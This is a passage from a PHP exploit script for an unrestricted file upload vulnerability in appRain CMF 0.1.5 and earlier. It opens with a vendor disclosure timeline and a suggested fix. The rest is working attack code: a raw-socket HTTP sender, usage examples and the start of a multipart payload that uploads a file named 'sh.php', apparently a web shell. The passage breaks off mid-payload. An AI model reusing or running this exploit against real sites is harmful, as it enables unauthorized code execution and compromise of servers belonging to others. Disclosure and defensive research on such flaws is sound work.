check_admin_login(); add this lines of code at the beginning of the script [-] Disclosure timeline: [19/12/2011] - Vulnerability discovered [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135 [20/12/2011] - Vendor response and fix suggested [16/01/2012] - After four weeks still no fix released [19/01/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------+"; print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |"; print "\n+---------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] \n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /apprain-v015/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n"; $payload .= "